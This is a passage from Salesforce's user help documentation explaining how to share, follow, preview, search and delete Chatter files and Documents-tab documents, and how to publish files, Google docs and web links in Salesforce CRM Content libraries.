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• Documents from the Documents tab and attachments from the Notes and Attachments related list aren't listed
on the Files tab and can't be shared in Chatter.

• Salesforce CRM Content files in Chatter may be shared with more people than shown on the Sharing dialog box
if they are part of a content pack or delivery.

• The maximum number of times a file can be shared is 100. This includes files shared with people, groups, and
via links. If a file is privately shared and nears the 100 share maximum, consider making the file public by posting
it to your feed.

See Also:
Viewing Where a File is Shared

SEE FILE UPDATES IN YOUR FEED

Following Files
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Follow files so you can see updates in your Chatter feed on the Home page and Chatter page, including when a new file version
is uploaded. If you stop following a file, the file remains in your Files list, you just won't see updates in your feed anymore.

Click Follow to start seeing updates, or click  to stop seeing updates:

• On the file's detail page

• Next to the file in a feed

• Next to the file on the Files page

• Next to the file on the Files Shared with list on a group

• Next to the file on the Files Owned by list on a profile

• On the file hover

Note:

• You automatically follow files you upload in Chatter, attach to a Chatter feed, or upload to a Salesforce CRM
Content library.

• If you follow a file in Chatter that you have previously subscribed to in Salesforce CRM Content, you can
unsubscribe from the file in Salesforce CRM Content because you'll now be receiving updates about it in your
Chatter feed.

See Also:
Uploading a New Version of a File
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Viewing File Version History
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The file detail page shows the current version number of the file. Click Show all versions to see the Version History list. The
list shows you all the versions of the file uploaded in Chatter, including the current version. From the list you can preview or
download the file, see who updated it and when, and see the description if provided. The file detail page always shows the
most current version of a file.

See Also:
Uploading a New Version of a File
Following Files

File Recommendations
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Chatter recommends files that you might want to follow based on the popularity of the file, determined by the number of
people who have viewed or downloaded the file. To see an expanded list of your recommendations, click More in the
Recommendations section. If no recommendations appear, then you already follow all the recommended files.

See Also:
Following Files

FILE PREVIEWS AND DETAILS

Viewing the File Detail Page
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Open a file detail page by clicking a file name on a Chatter feed, on a files list, on a file hover, or by clicking More Actions >
Preview next to the file in a feed. On the file detail page, you can see details about Chatter files and Salesforce CRM Content
files.

From a file detail page, you can:
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• View the file without downloading it. If the file has multiple pages, click on the enhanced document player or use the
arrow keys on your keyboard to see each page, zoom in or out, or change the preview width and screen size. Files owners
and anyone with access to the file can preview it.

Note: Not all files can be previewed, such as copy-protected PDFs, unknown file types, and any file larger than
25 MB. For files that can’t be previewed, the Preview option isn’t available on feeds or list views, and files appear
as generic file type icons in the feed. Some Microsoft Office 2007 features don't display correctly in previews.

• See if the file is private ( ), privately shared ( ), or shared with your company ( ).
• Click Download to open or save the file. Anyone who can see a file can download it.
• Click File Sharing Settings to share a file with people, groups, or via file link, or see the Sharing Settings. Anyone

who can see a file can share it.
• Click Make private on the Sharing Settings dialog box to remove the file and file link, if applicable, from everywhere it's

been shared. Or click Restrict access if the file originated in a Salesforce CRM Content library to remove the file from
everywhere it's been shared except the library. Only owners and users with the “Modify all Data” permission can make a
file private ( ) or restrict access.

• Click Upload New Version to update the file with a newer version. Only file owners, collaborators, and users with the
“Modify all Data” permission can upload a new version of a file.

• Click Edit Details to edit the name or description of the file. Only file owners, collaborators, and users with the “Modify
All Data” permission can edit file details.

• Click Delete to delete the file. Only file owners and users with the “Modify All Data” permission can delete files.
• See who the file is owned by and when it was last modified.

• See the file's description and click the edit icon ( ) to edit the description, or add a description by clicking Add Description.
• See the file's current version number and click Show all versions to see the file's version history.

• Click Follow to follow the file or click  to stop following the file.
• See who's following the file.

• See who and what locations the file is shared with.

• If the file originated in Salesforce CRM Content, click Go to Content Detail Page to see the content detail page of that
file. Most actions performed on files that originated in Salesforce CRM Content must be done on the file's content detail
page instead of the file detail page.

• Click the Files or Chatter links at the top of the page to go to the Files list or the Chatter page.

• See other files that people who viewed this file also viewed. If no other files have been viewed by the same people, the
People Also Viewed section doesn't appear on the file detail page.

See Also:
Viewing File Version History
Viewing Where a File is Shared
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Editing File Details
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

To edit a file's name and description:

1. On a file detail page, click Edit Details or click the edit icon ( ) next to the description.
2. Optionally, edit the file name and description.
3. Click Save.

If there is no description and you want to add one, click Add Description or click the edit icon ( ) next to the description.

File owners, collaborators, and users with the “Modify All Data” permission can edit file details.

See Also:
Viewing the File Detail Page

Viewing Where a File is Shared
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

The Shared With list on a file detail page shows you the file owner and who the file is shared with.

Click Show All to view the full list. From the Sharing Settings dialog box you can:

• See who the file is shared with and their permission: owner, collaborator, viewer, or no access.

• Click People on the Sharing Settings dialog box to share the file with specific people.

• Click Groups on the Sharing Settings dialog box to share the file with specific groups.

• Click Anyone with link on the Sharing Settings dialog box to create and share a file link.

• Click Make private to remove the file and file link, if applicable, from everywhere it's been shared. Or click Restrict access
if the file originated in a Salesforce CRM Content library to remove the file from everywhere it's been shared except the
library. Only owners and users with the “Modify all Data” permission can make a file private ( ) or restrict access.

• On the Sharing Settings dialog box, click  next to a person's or group's name to stop sharing the file with them.
• Click Next and Previous to see more of the list, or click Done to close the window.

See Also:
Making a File Private
File Sharing Settings and Permissions
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Deleting a File from the File Detail Page
Available in: Group, Professional, Enterprise, Unlimited, Contact Manager, and Developer Editions

Click Delete on a file's detail page to delete the file and remove it from all locations where it's been shared. If the file is shared
via link, anyone with the link will no longer have access to the file. To restore the deleted file, click on the Recycle Bin link
on the Home page. Select the file and click Undelete. The file is restored as well as all of the shares that were associated with
it.

Note: Only file owners and users with the “Modify All Data” permission can delete files. To learn who can perform
which actions on a file, see File Sharing Settings and Permissions on page 2412.

See Also:
Removing and Deleting Files and Links from a Chatter Feed

DOCUMENT LIBRARIES

Document Library Overview
Available in: All Editions except Database.com

A document library is a place to store files without attaching them to accounts, contacts, opportunities, or other records. Each
document in the document library resides in a folder. The folder’s attributes determine the accessibility of the folder and the
documents within it.

Displaying The Documents Tab

If your Documents tab is not visible, you can customize your display to show it.

Note:  The Documents tab is not part of Salesforce CRM Content.

See Also:
Differences between Files, Salesforce CRM Content, Salesforce Knowledge, Documents, and Attachments
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Documents Home
Available in: All Editions except Database.com

User Permissions Needed

“Read” on documentsTo view Documents tab:

“Read” on documentsTo view documents:

“Create” on documentsTo upload new documents:

Clicking on the Documents tab displays the documents home page.

Note:  If the Documents tab is not visible, you can customize your display to show it.

• Under Find a Document, enter keywords to search for a document.

• In the Document Folders section, select a folder to view all the documents contained in that folder.

• The Recent Documents section displays the last ten or twenty-five documents you viewed, with the most recently-viewed
document listed first. This list is derived from your recent items and includes records owned by you and other users. Toggle
the Show 25 items and Show 10 items links to change the number of items that display.

• In the Recent Documents section, click New to upload a new document.

Note:  The Documents tab is not part of Salesforce CRM Content.

See Also:
Uploading and Replacing Documents
Viewing Document Lists
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Viewing Document Lists
Available in: All Editions except Database.com

User Permissions Needed

“Read” on documentsTo view documents:

“Edit” on documentsTo change document properties:

“Edit” on documentsTo replace documents:

“Delete” on documentsTo delete documents:

The documents list page displays a list of documents in a selected folder. From this page, you can view detailed document
information or manipulate the document.

• Click the document name to view the document properties.

• Click Edit  next to a document to edit the document properties.

• Click Del to move the document to the Recycle Bin.

• Click View to open the file in its associated application. If a file type is not recognized or the application is not loaded on
your machine, Salesforce displays a standard download dialog prompting you to choose a save option.

• Choose a folder to view a list of documents stored in that folder.

• Click any column heading to sort the documents in ascending or descending order by the information in that column.

• At the top of the list, click a letter to display the contents of the sorted column that begin with that character.

• Click Next Page  or Previous Page to go to the next or previous set of documents.

• At the bottom of the document list, select fewer or more to view a shorter or longer display list.

• Click Printable View to display the current list view in a format that is ready for printing.

Note:  If you can't find a document, you may not have access to the folder that contains it.

See Also:
Changing Document Authors

2423

Viewing Document ListsCollaborate within Your Company



Uploading and Replacing Documents
Available in: All Editions except Database.com

User Permissions Needed

“Create” on documentsTo upload new documents:

“Edit” on documentsTo replace documents:

Uploading a New Document

To upload a document:

1. Click New Document from the Documents tab or click New next to Recent Documents on the documents home page.
If you do not have a New Document option, check if you have the correct permissions.

2. On the Upload New Document page, specify a descriptive Document Name. If you want to use the file name, leave this
field blank. The file name will appear automatically when you upload the file.

3. If you have the “Customize Application” permission, enter a unique name to be used by the API and managed packages.
4. You can check one of the following:

• Indicate Document is Internal: When checked, a flag is added to the document indicating that document
viewers should not share the file outside of the organization.

Note: Checking this box does not expressly enforce any security rules.

• Externally Available Image if the document is an image, such as a logo, that's not confidential. Check this
box to:

◊ Make the image available from HTML email templates without requiring a Salesforce username and password
◊ Use the image as a custom tab icon or custom app logo, which do require a Salesforce username and password to

view
◊ Display the image as a custom logo in meeting requests

The Indicate Document is Internal and Externally Available Image checkboxes are mutually exclusive;
you cannot select both.

5. Select a folder for the document.
6. Enter a description to use later as search criteria.
7. Enter keywords that you can use later as search criteria.
8. Select a document or path option.

• To upload a document, click Browse, choose the file, and click Open.
• To store a link to the document, enter the location of the document. Enter a path and file name or a URL such as:

C:\Quotes\quote.doc, \\Server\Departments\Marketing\logo.doc, or http://www.salesforce.com.

9. Click Save.
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Replacing a Document

To replace a document with an updated version:

1. Display the document you want to replace. For instructions on locating a document in the document library, see Searching
for Documents on page 2425.

2. Click Replace Document.
3. Select a document or path option.

• To upload a replacement, click Browse, choose the file, and click Open.
• To store a link to the replacement, enter the location of the replacement. Enter a path and file name or a URL such

as: C:\Quotes\quote.doc, \\Server\Departments\Marketing\logo.doc, or
http://www.salesforce.com.

4. Click Replace Document.

Tips for Uploading or Replacing Documents

• Documents stored as links cannot be attached to emails, but they save space in your document library.
• If your administrator enables document content search, Salesforce also performs a full-text search of the document. When

a new document is uploaded or an old one is replaced, its contents are available for searches.
• Salesforce stores the most recent upload date as the modified date.
• You can upload documents that have file names of up to 255 characters including the extension.
• The size limit for any document you upload is 5 MB. The maximum size for a custom-app logo is 20 KB.
• Your organization’s used file storage includes all files stored in the document library.
• If the Disallow HTML documents and attachments security setting is enabled for your organization, you cannot

upload files with the following file extensions: .htm, .html, .htt, .htx, .mhtm, .mhtml, .shtm, .shtml, .acgi.

See Also:
Displaying and Editing Document Properties

Searching for Documents
Available in: All Editions except Database.com

User Permissions Needed

“Read” on documentsTo view documents:

To find specific documents, use the Find Document button on the documents home page.

1. Click the Documents tab.
2. Enter your search terms. Salesforce searches the following fields:

• Document Name

• Keywords

• Description
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3. Click Find Document.

The search returns a list of documents that match all your search terms. The search results are listed in order of the closest
matches. The Keywords and Document Name fields are used to determine the closest matches. The fields you see are
predefined and cannot be changed.

Tip:  Use quotation marks around a phrase to search for the words in that sequence. For example, a search for
“my logos” returns documents whose fields or content contains that exact phrase, as well as my and logos. Without
quotation marks, your search returns any document whose fields or content includes any of the words in the search.
For example, my logos returns documents whose fields or content contains my and logos.

4. Select any document to jump directly to the detail page for that document, or click View to open the document in a new
window.

If your administrator enables document content search, Salesforce also performs a full-text search of the document. When a
new document is uploaded or an old one is replaced, its contents are available for searches.

Note: Salesforce automatically determines if the contents of a document can be searched. If the Document Content
Searchable property is checked on a document, then its contents have been processed successfully and can be
searched. If your document is large, it may take several minutes before Salesforce searches the contents of a document
and marks the Document Content Searchable property.

You can also find documents using global search.

1. Enter your search terms in the header search box.
2. Select Search Options... from the drop-down and select Documents to narrow your search results.
3. Click Search.

The following file types are supported for a document content search.

Note: The contents of documents that exceed the maximum sizes are not searched; however, the document fields
are still searched. Only the first 1,000,000 characters of text are searched. Text beyond this limit is not included in
the search.

Maximum SizeFile ExtensionsFile Type

5,120 KB
.htm

HTML (only the text within a <body>
tag)

.html

.xhtml

25,600 KB.pdfPDF

25,600 KB
.pot

PPT

.pps

.ppt

5,120 KB.rtfRTF

5,120 KB
.c

Text

2426

Searching for DocumentsCollaborate within Your Company



Maximum SizeFile ExtensionsFile Type

.cpp

.css

.csv

.ini

.java

.log

.sql

.txt

25,600 KB
.doc

Word

.dot

5,120 KB, or a maximum cell limit of
100,000 cells

.xls

.xlt

XLS

5,120 KB.xmlXML

In some instances documents are not searched. These include:

• If a file extension is changed to a different format, it is not searched, even if both extensions are valid. For example, a .txt
file that is renamed to .rtf is not searched.

• PDF and Word documents may have security restrictions that prevent them from being searched. To ensure that the
content is searchable, the “content extraction” property on your file must be set to “Enabled” when creating your document.

See Also:
Searching for Content
Searching for Files
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Deleting Documents
Available in: All Editions except Database.com

User Permissions Needed

“Delete” on documentsTo delete documents:

“Delete” on documentsTo restore documents:

To delete a document, click Del next to the document on the documents list page. Alternatively, click Delete on the documents
detail page.

When you delete a document, Salesforce stores it in the Recycle Bin. You can restore the document to your document library
within that time by clicking Undelete from the Recycle Bin.

Note:

• You can delete any document in your personal folder but you can only delete a document in a public folder if you
have the “Manage Public Documents” permission.

• If you delete a document that's included in a letterhead or HTML email template, any emails using the letterhead
or template display a broken link in its place. You can fix the broken link by removing the document from the
Recycle Bin.

• You can't delete a document that's being used as a custom logo in meeting requests. To delete it, you must either
select another document to use as a logo or uncheck the option to display a custom logo in meeting requests.

See Also:
Document Properties
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PROPERTIES

Displaying and Editing Document Properties
Available in: All Editions except Database.com

User Permissions Needed

“Read” on documentsTo view documents:

“Edit” on documentsTo update properties:

“Edit” on documentsTo replace documents:

“Edit” on documentsTo move documents:

“Delete” on documentsTo delete documents:

Displaying Documents - Once you have located a document on the documents home or list pages, click the document name
to display detailed information.

Editing Document Properties - To update document properties, click Edit.

Deleting Documents - To delete a document, click Delete.

Updating Documents - To replace a document with an updated version, click Replace Document.

Emailing Documents - To email a document to a contact, click Email Document, fill in the details of the email, and click
Send. The document is sent as an attachment to the email and is logged in the Activity History for the contact. Documents
that reference URLs rather than physical files cannot be emailed. For a document that is an image embedded in an HTML
email template, such as a logo in a letterhead, make sure the document is marked as Externally Available on the
Documents tab so that a user who does not have a Salesforce username and password can view the image when it is received
in an email.

Searching a Document - To search for a document, enter search terms and click Find Document. A list of documents that
match your search terms displays. You can search for terms using the following fields:

• Document Name

• Keywords

• Description

If Document Content Searchable is checked, the content of a document can also be searched.

Viewing Folder Contents - To view all the documents in a folder, click the folder name.
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Moving Documents - To store a document in a different folder, click Edit, choose a new folder, and click Save.

See Also:
Changing Document Authors

Document Properties
Available in: All Editions except Database.com

Below is a description of the properties in alphabetical order that are stored for each document in the document library.

DescriptionField

The main point of contact for a document. Initially, the person
uploading the document is the author. Thereafter, the author
can be any selected user.

Author

The name of the person who originally uploaded the file.Created By

The name of the person who last uploaded the file.Modified By

The name of the folder that contains the document.Folder

A checkbox that indicates if the content within a document
can be searched via the Find Document button on the

Document Content Searchable

Documents tab. This checkbox is automatically set by
Salesforce.

The name of the document including its file extension.Document Name

A unique name used to refer to the document when using the
Force.com API. In managed packages, this name prevents

Document Unique Name

naming conflicts on package installations. This name can
contain only underscores and alphanumeric characters, and
must be unique in your organization. It must begin with a
letter, not include spaces, not end with an underscore, and not
contain two consecutive underscores. With this field, a
developer can change certain components' names or titles in
a managed package and the changes are reflected in a
subscriber's organization.

A statement distinguishing this document from others.Description

A checkbox that adds a flag to the document indicating that
document viewers should not share the file outside of the

Indicate Document is Internal

organization. Checking this box does not expressly enforce
any security rules.
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DescriptionField

The Indicate Document is Internal and
Externally Available Image checkboxes are mutually
exclusive; you cannot select both.

A checkbox that indicates if the document is an image available
for HTML email templates, such as a logo in a letterhead,

Externally Available Image

and does not require a Salesforce username and password to
view in an email.

This checkbox indicates if the document is an image used as
a custom app logo or custom tab icon, which require a
Salesforce username and password to view.

The Indicate Document is Internal and
Externally Available Image checkboxes are mutually
exclusive; you cannot select both.

An open text field containing one or more words that describe
the document. The program checks for matches in this field
when doing a search.

Keywords

Stored in place of Document Name if you prefer to create a
link to the document instead of uploading it.

Path

The size of the document in bytes.Size

The file type is determined by the file extension. For example,
filename.ppt is recognized as a PowerPoint file. If the

Type

Disallow HTML documents and attachments security
setting is enabled for your organization, you cannot upload
files with the following file extensions: .htm, .html, .htt,
.htx, .mhtm, .mhtml, .shtm, .shtml, .acgi.

See Also:
Changing Document Authors
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Changing Document Authors
Available in: All Editions except Database.com

User Permissions Needed

“Edit” on documentsTo change documents:

Since documents are stored in folders that control user access, documents do not have owners like other types of records, but
they do have authors. The author represents the user that originally uploaded the document file.

To change the author of a document:

1. View the document you want to modify.
2. Click Change next to the Author field.

The Change link displays only on the detail page, not the edit page. If you do not see the Change link, you may not have
sufficient privileges to change a document author.

3. Enter a new author name. Alternatively, click the lookup icon to choose from a list of users.
4. Check the Send Notification Email box if you would like to alert the new author of this change.

Note:  When you change document authorship, Salesforce does not change the document’s visibility.

See Also:
Displaying and Editing Document Properties

SALESFORCE CRM CONTENT

Salesforce CRM Content Overview
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

With Salesforce CRM Content you can organize, share, search, and manage content within your organization and across key
areas of the Salesforce application. Content can include all file types, from traditional business documents such as Microsoft®

PowerPoint presentations to audio files, video files, Web pages, and Google® docs.

To learn the different ways files are used in Salesforce, see Differences between Files, Salesforce CRM Content, Salesforce
Knowledge, Documents, and Attachments on page 2403.
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Overview

Salesforce CRM Content simplifies content management by incorporating user-friendly features into the following tasks:

Organizing
Rather than keep files in folders that make content difficult to find, Salesforce CRM Content stores files in fully searchable
file repositories known as libraries. Administrators can create multiple libraries based on any classification, such as
department name, job function, or team, then configure user permissions within the library to balance content access
with security. Authors assign descriptive labels called tags to help classify and organize content across libraries. You can
view a list of all content that belongs to a particular tag or filter search results based on a tag or tags. Salesforce CRM
Content also provides personal libraries, which allow users to reduce the clutter on their desktops while using
content-management benefits such as document search and version control.

Searching
The powerful Salesforce CRM Content search engine scans the entire body of the document as well as content properties
such as the title, description, tags, categorization data, and author name. You can filter searches by featured content, file
format, author, tags, libraries, or custom fields and then view the results with various levels of detail, providing an easy
way to find relevant content quickly. If Chatter is enabled for your organization, you can also filter your search results
by Chatter files. The “smart bar” graphic for downloads, comments, ratings, and subscribers allows you to compare
documents within a search result set.

Subscribing
Once a file is located, subscribing to it ensures that you receive an email notification when new versions are published
or changes are made to the file's properties. You can also subscribe to authors, tags, and libraries, thus reducing the time
spent searching for new or updated content. Notification emails will arrive real-time or once daily, depending on your
preferences.

Previewing
In Salesforce CRM Content you do not need to download a large document to determine if its content is relevant to
you. The content details page provides document details at a glance, including document title, author, description, tags,
libraries, comments, votes, versions, subscribers, and downloads. If the document is a Microsoft PowerPoint, Word,
Excel, or Adobe® PDF file, you can preview the entire file in your browser without downloading it. Some Microsoft
Office 2007 features don't display correctly in previews. Copy-protected PDFs can't be previewed.

Contributing
Uploading new or revised files in Salesforce CRM Content is fast and easy. During the upload process you choose a
library and content type for your file or Web link, write a description, assign one or more tags, and fill out any customized
fields that help categorize and define your content. Version management does not require checking files in and out,
rather, you simply upload a new version of the file and Salesforce CRM Content maintains a version list accessible from
the content details page. You can download past versions of a file and read all reason-for-change comments that an
author may have included with a new version.

Reviewing Usage and Providing Feedback
Salesforce CRM Content provides several methods for determining whether content is valuable to readers. Featuring a
piece of content increases its visibility in search results. Voting thumbs up or thumbs down on a file, Web link, or Google
doc and adding comments allow you to participate directly in content improvement. You can also see who has subscribed
to a file, link, or doc and how many times files have been downloaded. The Reports tab allows you to create standard or
custom reports on Salesforce CRM Content data. If the content delivery feature is enabled, you can send content to
colleagues, leads, and contacts and then track how often the content has been previewed or downloaded.

Sharing Content in Salesforce
Salesforce CRM Content is also integrated with leads, accounts, contacts, opportunities, cases, products, and custom
objects. If Salesforce CRM Content functionality is enabled on the Opportunity tab, for example, Salesforce CRM
Content uses the fields on the opportunity detail page to search for files that may be relevant to that opportunity. You

2433

Salesforce CRM Content OverviewCollaborate within Your Company



can drill down in the search results as needed or run your own search and then attach one or more files to the opportunity.
The most current version of the file will be available on the detail page for the life of the opportunity.

Sharing Content in Salesforce Classic
Salesforce CRM Content is available in Salesforce Classic. Users can share content with customers and colleagues from
the mobile application when they're away from their desks. Ask your administrator to set up mobile Content.

See Also:
Differences between Files, Salesforce CRM Content, Salesforce Knowledge, Documents, and Attachments

CONTRIBUTE CONTENT

Contributing Files to Salesforce CRM Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Manage Libraries checked in your library permission
definition

OR

Add Content checked in your library permission definition

To upload and publish files to a public library:

NoneTo upload and save files to a personal library:

To publish a file in Salesforce CRM Content:

1. Click the Libraries tab.
2. Do one of the following:

• To publish a new file, click Contribute and select the file.
• To publish a file that is already in your personal library, click the My Personal Content tab, locate the file, and then

click Publish.

Note:  To publish multiple pieces of content at once, select two or more checkboxes in the My Personal Content
tab and click Publish Selected. All selected content displays in a tab set within the Save or Publish Content dialog.
Complete the following steps for each tab in the Save or Publish Content dialog.

3. Assign a title and description to your file.
4. Choose a library. This becomes the managing (home) library, meaning that the content can be shared with another library

but only revised by a user with author permissions in the managing library. If you do not want the content to be visible to
other users in your organization, for example if your work is still in progress, choose Save in my personal library.
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5. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you do
not choose a language, Salesforce CRM Content associates your content with your personal language setting. If users
restrict their content searches to a particular language, only content associated with that language is displayed in the search
result set.

6. To publish the content on behalf of another author, choose that author from the drop-down list.
7. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags in
the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags list and
the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows the 20 tags
you have used most recently. Click a tag to add it to the Tags field automatically.

• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When you
select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

8. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

9. After completing the custom fields, click Publish or Save.

Note:

• Unique values in custom fields that are set for the first version of a file aren't included if you upload a new version.
You can set the unique values in the new version as long as they aren't the same as a previous version.

• Files published to a shared library are added to your Files tab and available to other Chatter users in your
organization. Files published to your personal library are added to your Files tab, but are private and not shared
with anyone. For more information about Chatter files and Salesforce CRM Content files, see Differences between
Files, Salesforce CRM Content, Salesforce Knowledge, Documents, and Attachments on page 2403.

• Contact Manager, Group, Professional, Enterprise, and Unlimited Edition customers can publish a maximum
of 5,000 new versions per 24–hour period. Developer Edition and trial users can publish a maximum of 2,500
new versions per 24–hour period.

See Also:
Updating Content Versions
Creating and Modifying Content Packs in Salesforce CRM Content
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Uploading and Publishing Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Manage Libraries checked in your library permission
definition

OR

Add Content checked in your library permission definition

To upload and publish files and Web links:

Google Apps accountTo create and publish Google docs:

The Libraries tab has several publishing-related options at the top of the page that let you upload, classify, and publish files,
content packs, Web links, and Google docs in Salesforce CRM Content.

Note:  The Add Google Doc drop-down list on the Libraries tab only displays if your administrator has enabled the
Add Google Doc to Salesforce service.

For information about associating Google docs with Salesforce CRM Content from your Google Apps account, see
Installing the Add Google Doc to Salesforce Browser Button on page 2458.

To publish files, Web links, and Google docs in Salesforce CRM Content, or to create content packs, refer to the following
topics:

• Contributing Files to Salesforce CRM Content

• Contributing Web Links to Salesforce CRM Content

• Contributing Google Docs to Salesforce CRM Content

• Creating and Modifying Content Packs in Salesforce CRM Content

See Also:
Updating Content Versions
Creating Content Deliveries

Salesforce CRM Content File Size Limits
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

The following are maximum file size limits for files in Salesforce CRM Content:

• 2 GB

• 10 MB for Google Docs

2436

Uploading and Publishing ContentCollaborate within Your Company



• 38 MB when uploaded via the API

• 10 MB when uploaded via Visualforce

See Also:
File Size Limits in Salesforce

Contributing Google Docs to Salesforce CRM Content
Salesforce CRM Content is available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer
Editions

Google Docs is available in all editions

User Permissions Needed

Library member with a library permission that permits
contributing content

AND

Google Apps account

Creating a Google doc and linking it to a Salesforce CRM
Content library:

With Google Docs™, you can create and share on-demand documents, presentations, and spreadsheets (Google docs) and
see your changes in real time as you collaborate with other users. Associating your Google docs with Salesforce CRM Content
allows you to access all types of content from a single, fully-indexed location. It also ensures that your Google docs receive the
feedback and tracking benefits provided by Salesforce CRM Content features such as votes, comments, and subscriptions.

Note:  The Add Google Doc drop-down list on the Libraries tab only displays if your administrator has enabled the
Add Google Doc to Salesforce service.

For information about associating Google docs with Salesforce CRM Content from your Google Apps account, see
Installing the Add Google Doc to Salesforce Browser Button on page 2458.

Adding New Google Docs to a Salesforce CRM Content Library

1. On the Libraries tab, choose New Document, New Spreadsheet, or New Presentation from the Add Google Doc
drop-down button. You may be prompted to log in to Google Apps.

2. Enter a name for your document, spreadsheet, or presentation and click Create Google Doc. The blank Google doc opens
and you can begin adding your text. The Save or Publish Content dialog in Salesforce CRM Content also opens.

3. In the Save or Publish Content dialog:

a. Optionally, provide a description of your Google doc. The description provides at-a-glance information for users who
view the doc's content details page in Salesforce CRM Content.

b. Choose a library. If you do not want to put the doc in a public library, for example if the doc is still in progress, choose
Save in my personal library.

c. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you
do not choose a language, Salesforce CRM Content associates your content with your personal language setting. If
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users restrict their content searches to a particular language, only content associated with that language is displayed in
the search result set.

d. To publish the content on behalf of another author, choose that author from the drop-down list.
e. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags
in the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags
list and the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows
the 20 tags you have used most recently. Click a tag to add it to the Tags field automatically.

• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When
you select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

f. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

g. After completing any custom fields, click Publish to save the Google doc to its Salesforce CRM Content library, or
click Cancel to save the doc to your personal library. From there you can delete the doc from Salesforce CRM Content
or publish it later. Once a Google doc is published in Salesforce CRM Content, all library members can search for the
doc and provide feedback such as comments and votes.

Note:  While you have your Google doc open, remember to share it with other Google Apps users in your organization.
Only users with access to the Google doc in their Google Apps account can open the doc from Salesforce CRM
Content.

Adding Existing Google Docs to a Salesforce CRM Content Library

If you have an existing Google doc, you can publish it into a library:

1. On the Libraries tab, choose Add Existing from the Add Google Doc drop-down button. A list of all the Google docs in
your Google Apps account displays.

2. Optionally, limit your list of docs by entering a search term or choosing to view only documents, presentations, or
spreadsheets.

3. Select the Google doc that you want to add to Salesforce CRM Content and click Contribute.
4. Optionally, edit the title of your Google doc and/or add a description.
5. Choose a library. If you do not want to add the doc to a public library, for example if the doc is still in progress, choose

Save in my personal library.
6. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you do

not choose a language, Salesforce CRM Content associates your content with your personal language setting. If users
restrict their content searches to a particular language, only content associated with that language is displayed in the search
result set.

7. To publish the content on behalf of another author, choose that author from the drop-down list.
8. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags in
the Tags field. As you type a tag, Salesforce CRM Content autosuggests tags based on your My Recent Tags list and
the Popular Tags section on the Libraries tab. The My Recent Tags list on the Contribute window shows the 20 tags
you have used most recently. Click a tag to add it to the Tags field automatically.
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• If your administrator assigned the guided tagging rule, you can choose from the list of suggested tags or enter a new
tag. Click a suggested tag to add it to the Tags field automatically.

• If your administrator assigned the restricted tagging rule, you must choose from the list of suggested tags. When you
select a tag it turns green.

• You can't change or delete tag names. You can remove tags from a document, but that doesn't delete the tag.
• Tags are case insensitive. You can't have two tags with the same name even if they use different upper and lowercase

letters. The case of the original tag is always used.

9. If multiple content types are available, choose one from the drop-down list. The content type determines which custom
fields appear for you to categorize and define your content.

10. After completing the custom fields, click Publish or Save.

See Also:
Managing Libraries

Contributing Web Links to Salesforce CRM Content
Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

Manage Libraries checked in your library permission
definition

OR

Add Content checked in your library permission definition

To publish Web links in Salesforce CRM Content:

To classify and publish a Web link in Salesforce CRM Content:

1. Click the Libraries tab.
2. To add a new link, click Contribute > Do you want to link to a website instead?, then enter the URL, and click Contribute.

To publish a link that is already in your personal library, click the My Personal Content tab, locate the link, and click
Publish.

Note:  To publish multiple pieces of content at once, select two or more checkboxes in the My Personal Content
tab and click Publish Selected. All selected content displays in a tab set within the Save or Publish Content dialog.
Complete the following steps for each tab in the Save or Publish Content dialog.

3. Assign a title and description to your Web link.
4. Choose a library. This becomes the managing (home) library, meaning that the Web link can be shared with another

library but its content details page can only be edited by a user with relevant permissions in the managing library. If you
do not want the link to be visible to other users in your organization, choose Save in my personal library.

5. Optionally, choose a language. The Language drop-down list is displayed if multi-language support is enabled. If you do
not choose a language, Salesforce CRM Content associates your content with your personal language setting. If users
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restrict their content searches to a particular language, only content associated with that language is displayed in the search
result set.

6. To publish the content on behalf of another author, choose that author from the drop-down list.
7. Tag your content. Your tagging permission depends on the tagging rule assigned to the library:

• If the library does not have a tagging rule or if your administrator assigned the open tagging rule, you can enter tags in
